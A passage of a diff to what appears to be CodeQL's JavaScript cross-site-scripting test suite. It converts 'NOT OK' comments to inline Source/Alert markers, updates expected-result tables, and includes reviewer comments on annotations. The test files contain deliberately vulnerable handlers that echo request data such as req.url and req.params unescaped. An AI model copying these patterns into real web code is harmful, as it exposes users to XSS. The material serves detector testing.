vulnerability due to $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to $@. 
| ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. 
| ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:33:12:33:18 | mytable | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:31:14:31:21 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to $@. 
| ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... 
rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js index c30ab48a511d..3fba93d3b4a7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/cookies.js @@ -5,6 +5,6 @@ var app = express(); app.use(cookieParser()); app.get('/cookie/:name', function(req, res) { - // OK + res.send("Here, have a cookie: " + req.cookies[req.params.name]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js index e0eed4a17d67..8377357a0c4c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/etherpad.js @@ -6,7 +6,7 @@ app.get("/some/path", (req, res) => { let response = "Hello, world!"; if(req.query.jsonp && isVarName(req.query.jsonp)) - response = req.query.jsonp + "(" + response + ")"; + response = req.query.jsonp + "(" + response + ")"; // $ Source - res.send(response); + res.send(response); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js index 45ad3a94920c..a359780e57b0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/formatting.js 
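Review bot: In the cookies.js hunk the standalone `// OK` above `res.send("Here, have a cookie: " + req.cookies[req.params.name]);` is replaced by a blank line, which leaves no hint of why a handler that echoes request-derived data is expected to stay silent. The missing annotation still encodes "no alert", but this is the least obvious negative in the directory, since the cookie name comes from `req.params.name`. Presumably the reason is that cookie values are not modelled as a reflected-XSS source; if that is confirmed, I would keep the line as `// OK - cookie values are not treated as a source for reflected XSS`, in the `// OK - <reason>` form the commit retains in other test files.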
@@ -1,8 +1,8 @@ var express = require('express'); express().get('/user/', function(req, res) { - var evil = req.query.evil; - res.send(console.log("
    %s
    ", evil)); // OK (returns undefined) - res.send(util.format("
    %s
    ", evil)); // NOT OK - res.send(require("printf")("
    %s
    ", evil)); // NOT OK + var evil = req.query.evil; // $ Source + res.send(console.log("
    %s
    ", evil)); // OK - returns undefined + res.send(util.format("
    %s
    ", evil)); // $ Alert + res.send(require("printf")("
    %s
    ", evil)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js index aed560fc0767..9e03025792d0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/live-server.js @@ -1,15 +1,15 @@ var liveServer = require("live-server"); const middleware = [function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }]; middleware.push(function(req, res, next) { - const tainted = req.url; + const tainted = req.url; // $ Source - res.end(`${tainted}`); // NOT OK + res.end(`${tainted}`); // $ Alert }); var params = { diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx index 9bb3cc46e963..d6c2232e9571 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/Next.jsx @@ -5,14 +5,14 @@ export default function Post() { Post.getInitialProps = async (ctx) => { const req = ctx.req; const res = ctx.res; - res.end(req.url); + res.end(req.url); // $ Alert return {} } export async function getServerSideProps(ctx) { const req = ctx.req; const res = ctx.res; - res.end(req.url); + res.end(req.url); // $ Alert return { props: {} } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js index 7a0c18245245..6224aea72622 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/pages/api/myapi.js 
@@ -1,3 +1,3 @@ export default function handler(req, res) { - res.send(req.url); + res.send(req.url); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js index 4b2edd4e4faf..a0f2120b2c4f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/partial.js @@ -7,37 +7,37 @@ let app = express(); app.get("/some/path", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = sendResponse.bind(null, req.url); + let callback = sendResponse.bind(null, req.url); // $ Source [1, 2, 3].forEach(callback); }); app.get("/underscore", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = underscore.partial(sendResponse, req.url); + let callback = underscore.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); app.get("/lodash", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = lodash.partial(sendResponse, req.url); + let callback = lodash.partial(sendResponse, req.url); // $ Source [1, 2, 3].forEach(callback); }); app.get("/ramda", (req, res) => { function sendResponse(x, y) { - res.send(x + y); // NOT OK + res.send(x + y); // $ Alert } - let callback = R.partial(sendResponse, [req.url]); + let callback = R.partial(sendResponse, [req.url]); // $ Source [1, 2, 3].forEach(callback); }); 
@@ -49,7 +49,7 @@ app.get("/return", (req, res) => { let callback = getFirst.bind(null, req.url); res.send(callback); // OK - the callback itself is not tainted - res.send(callback()); // NOT OK - but not currently detected [INCONSISTENCY] + res.send(callback()); // $ MISSING: Alert - not currently detected res.send(getFirst("Hello")); // OK - argument is not tainted from this call site }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js index d48ec23af5f1..41eb48b68d65 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/promises.js @@ -2,10 +2,10 @@ let express = require('express'); let app = express(); app.get("/some/path", (req, res) => { - new Promise((resolve, reject) => resolve(req.query.data)) - .then(x => res.send(x)); // NOT OK + new Promise((resolve, reject) => resolve(req.query.data)) // $ Source + .then(x => res.send(x)); // $ Alert new Promise((resolve, reject) => resolve(req.query.data)) .then(x => escapeHtml(x)) - .then(x => res.send(x)); // OK + .then(x => res.send(x)); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js index 60399a9b63d6..660743338848 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst2.js 
@@ -3,88 +3,88 @@ var express = require('express'); var app = express(); app.get('/user/:id', function(req, res) { - let { p, q: r } = req.params; - res.send(p); // NOT OK - res.send(r); // NOT OK + let { p, q: r } = req.params; // $ Source + res.send(p); // $ Alert + res.send(r); // $ Alert }); const aKnownValue = "foo"; app.get('/bar', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source if (p == aKnownValue) - res.send(p); // OK - res.send(p); // NOT OK + res.send(p); + res.send(p); // $ Alert if (p != aKnownValue) - res.send(p); // NOT OK + res.send(p); // $ Alert else - res.send(p); // OK + res.send(p); }); const clone = require('clone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = clone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const serializeJavaScript = require('serialize-javascript'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var serialized = serializeJavaScript(p); - res.send(serialized); // OK + res.send(serialized); var unsafe = serializeJavaScript(p, {unsafe: true}); - res.send(unsafe); // NOT OK + res.send(unsafe); // $ Alert }); const fclone = require('fclone'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = fclone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const jc = require('json-cycle'); app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = jc.retrocycle(jc.decycle(obj)); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const sortKeys = require('sort-keys'); 
app.get('/baz', function(req, res) { - let { p } = req.params; + let { p } = req.params; // $ Source var obj = {}; obj.p = p; var other = sortKeys(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index c7d0fd91a4a0..5419959d61ec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -2,12 +2,12 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { - let { p } = req.params; - res.send(p); // NOT OK + let { p } = req.params; // $ Source + res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { - const code = prettier.format(reg.body, { semi: false, parser: "babel" }); - res.send(code); // NOT OK + const code = prettier.format(reg.body, { semi: false, parser: "babel" }); // $ Source + res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql deleted file mode 100644 index 38bae3a6aea6..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.StoredXssQuery as StoredXss 
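Review bot: In the tst2.js hunk three sends that must stay silent lose their bare `// OK` without gaining a reason: the two guarded by the comparison with `aKnownValue`, and `res.send(serialized)`. These are the cases that pin barrier behaviour, and with unbraced `if`/`else` bodies it is now hard to see at a glance which `res.send(p)` is the guarded one. I would annotate them in the `// OK - <reason>` form used elsewhere in this commit, e.g. `res.send(p); // OK - p was compared with aKnownValue` and `res.send(serialized); // OK - serialized without the unsafe option`, so the contrast with the `{unsafe: true}` alert two lines below is explicit.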
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected index b44f37467ce7..a2bcd0163fde 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.expected @@ -1,3 +1,9 @@ +#select +| xss-through-filenames.js:8:18:8:23 | files1 | xss-through-filenames.js:7:43:7:48 | files1 | xss-through-filenames.js:8:18:8:23 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:7:43:7:48 | files1 | stored value | +| xss-through-filenames.js:26:19:26:24 | files1 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:26:19:26:24 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | +| xss-through-filenames.js:33:19:33:24 | files2 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:33:19:33:24 | files2 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | +| xss-through-filenames.js:37:19:37:24 | files3 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:37:19:37:24 | files3 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | +| xss-through-torrent.js:7:11:7:14 | name | xss-through-torrent.js:6:13:6:24 | torrent.name | xss-through-torrent.js:7:11:7:14 | name | Stored cross-site scripting vulnerability due to $@. | xss-through-torrent.js:6:13:6:24 | torrent.name | stored value | edges | xss-through-filenames.js:7:43:7:48 | files1 | xss-through-filenames.js:8:18:8:23 | files1 | provenance | | | xss-through-filenames.js:17:21:17:26 | files2 [ArrayElement] | xss-through-filenames.js:19:9:19:14 | files2 [ArrayElement] | provenance | | 
@@ -54,9 +60,3 @@ subpaths | xss-through-filenames.js:30:9:30:14 | files1 | xss-through-filenames.js:30:34:30:37 | file | xss-through-filenames.js:31:13:31:18 | [post update] files2 [ArrayElement] | xss-through-filenames.js:33:19:33:24 | files2 | | xss-through-filenames.js:30:9:30:14 | files1 | xss-through-filenames.js:30:34:30:37 | file | xss-through-filenames.js:31:13:31:18 | [post update] files2 [ArrayElement] | xss-through-filenames.js:33:19:33:24 | files2 [ArrayElement] | | xss-through-filenames.js:35:29:35:34 | files2 [ArrayElement] | xss-through-filenames.js:17:21:17:26 | files2 [ArrayElement] | xss-through-filenames.js:22:16:22:30 | files3.join('') | xss-through-filenames.js:35:22:35:35 | format(files2) | -#select -| xss-through-filenames.js:8:18:8:23 | files1 | xss-through-filenames.js:7:43:7:48 | files1 | xss-through-filenames.js:8:18:8:23 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:7:43:7:48 | files1 | stored value | -| xss-through-filenames.js:26:19:26:24 | files1 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:26:19:26:24 | files1 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | -| xss-through-filenames.js:33:19:33:24 | files2 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:33:19:33:24 | files2 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | -| xss-through-filenames.js:37:19:37:24 | files3 | xss-through-filenames.js:25:43:25:48 | files1 | xss-through-filenames.js:37:19:37:24 | files3 | Stored cross-site scripting vulnerability due to $@. | xss-through-filenames.js:25:43:25:48 | files1 | stored value | -| xss-through-torrent.js:7:11:7:14 | name | xss-through-torrent.js:6:13:6:24 | torrent.name | xss-through-torrent.js:7:11:7:14 | name | Stored cross-site scripting vulnerability due to $@. 
| xss-through-torrent.js:6:13:6:24 | torrent.name | stored value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref index 27140feea760..200bebe2a18e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/StoredXss.qlref @@ -1 +1,2 @@ -Security/CWE-079/StoredXss.ql \ No newline at end of file +query: Security/CWE-079/StoredXss.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index c04e0d784efc..0233339ad26e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -4,8 +4,8 @@ var fs = require('fs'); var express = require('express'); express().get('/', function(req, res) { - fs.readdir("/myDir", function (error, files1) { - res.send(files1); // NOT OK + fs.readdir("/myDir", function (error, files1) { // $ Source + res.send(files1); // $ Alert }); }); @@ -22,19 +22,19 @@ http.createServer(function (req, res) { return files3.join(''); } - fs.readdir("/myDir", function (error, files1) { - res.write(files1); // NOT OK + fs.readdir("/myDir", function (error, files1) { // $ Source + res.write(files1); // $ Alert var dirs = []; var files2 = []; files1.forEach(function (file) { files2.push(file); }); - res.write(files2); // NOT OK + res.write(files2); // $ Alert var files3 = format(files2); - res.write(files3); // NOT OK + res.write(files3); // $ Alert }); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index dcf530e3ef5c..2569f5623d74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -3,6 +3,6 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), - name = torrent.name; - res.send(name); // NOT OK + name = torrent.name; // $ Source + res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql deleted file mode 100644 index e67885e96b96..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.UnsafeHtmlConstructionQuery as UnsafeHtmlConstruction diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected index 678b42231c9a..499cf6cce49d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected 
+++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/UnsafeHtmlConstruction.expected 
@@ -1,3 +1,75 @@ +#select +| jquery-plugin.js:12:31:12:41 | options.foo | jquery-plugin.js:11:34:11:40 | options | jquery-plugin.js:12:31:12:41 | options.foo | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:34:11:40 | options | library input | jquery-plugin.js:12:20:12:53 | " ... /span>" | cross-site scripting | +| jquery-plugin.js:14:31:14:35 | stuff | jquery-plugin.js:11:27:11:31 | stuff | jquery-plugin.js:14:31:14:35 | stuff | This HTML construction which depends on $@ might later allow $@. | jquery-plugin.js:11:27:11:31 | stuff | library input | jquery-plugin.js:14:20:14:47 | " ... /span>" | cross-site scripting | +| lib2/index.ts:2:27:2:27 | s | lib2/index.ts:1:28:1:28 | s | lib2/index.ts:2:27:2:27 | s | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:1:28:1:28 | s | library input | lib2/index.ts:3:47:3:50 | html | cross-site scripting | +| lib2/index.ts:7:58:7:65 | settings | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:7:58:7:65 | settings | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:7:47:7:77 | " ... /span>" | cross-site scripting | +| lib2/index.ts:18:62:18:65 | name | lib2/index.ts:6:29:6:36 | settings | lib2/index.ts:18:62:18:65 | name | This HTML construction which depends on $@ might later allow $@. | lib2/index.ts:6:29:6:36 | settings | library input | lib2/index.ts:18:51:18:77 | " ... /span>" | cross-site scripting | +| lib2/src/MyNode.ts:2:29:2:29 | s | lib2/src/MyNode.ts:1:28:1:28 | s | lib2/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | lib2/src/MyNode.ts:1:28:1:28 | s | library input | lib2/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | +| lib/src/MyNode.ts:2:29:2:29 | s | lib/src/MyNode.ts:1:28:1:28 | s | lib/src/MyNode.ts:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. 
| lib/src/MyNode.ts:1:28:1:28 | s | library input | lib/src/MyNode.ts:3:49:3:52 | html | cross-site scripting | +| main.js:2:29:2:29 | s | main.js:1:55:1:55 | s | main.js:2:29:2:29 | s | This HTML construction which depends on $@ might later allow $@. | main.js:1:55:1:55 | s | library input | main.js:3:49:3:52 | html | cross-site scripting | +| main.js:7:49:7:49 | s | main.js:6:49:6:49 | s | main.js:7:49:7:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:6:49:6:49 | s | library input | main.js:8:48:8:66 | doc.documentElement | cross-site scripting | +| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:11:60:11:60 | s | library input | main.js:16:21:16:35 | xml.cloneNode() | cross-site scripting | +| main.js:12:49:12:49 | s | main.js:11:60:11:60 | s | main.js:12:49:12:49 | s | This XML parsing which depends on $@ might later allow $@. | main.js:11:60:11:60 | s | library input | main.js:17:48:17:50 | tmp | cross-site scripting | +| main.js:22:34:22:34 | s | main.js:21:47:21:47 | s | main.js:22:34:22:34 | s | This markdown rendering which depends on $@ might later allow $@. | main.js:21:47:21:47 | s | library input | main.js:23:53:23:56 | html | cross-site scripting | +| main.js:62:19:62:31 | settings.name | main.js:56:28:56:34 | options | main.js:62:19:62:31 | settings.name | This HTML construction which depends on $@ might later allow $@. | main.js:56:28:56:34 | options | library input | main.js:62:11:62:40 | "" + ... "" | cross-site scripting | +| main.js:67:63:67:69 | attrVal | main.js:66:35:66:41 | attrVal | main.js:67:63:67:69 | attrVal | This HTML construction which depends on $@ might later allow $@. 
| main.js:66:35:66:41 | attrVal | library input | main.js:67:47:67:78 | "" | cross-site scripting | +| main.js:81:35:81:37 | val | main.js:79:34:79:36 | val | main.js:81:35:81:37 | val | This HTML construction which depends on $@ might later allow $@. | main.js:79:34:79:36 | val | library input | main.js:81:24:81:49 | " ... /span>" | cross-site scripting | +| main.js:90:23:90:23 | x | main.js:93:43:93:43 | x | main.js:90:23:90:23 | x | This HTML construction which depends on $@ might later allow $@. | main.js:93:43:93:43 | x | library input | main.js:94:20:94:32 | createHTML(x) | cross-site scripting | +| main.js:99:28:99:28 | x | main.js:98:43:98:43 | x | main.js:99:28:99:28 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:100:24:100:26 | svg | cross-site scripting | +| main.js:103:43:103:43 | x | main.js:98:43:98:43 | x | main.js:103:43:103:43 | x | This markdown rendering which depends on $@ might later allow $@. | main.js:98:43:98:43 | x | library input | main.js:103:20:103:44 | myMerma ... id", x) | cross-site scripting | +| main.js:105:26:105:26 | x | 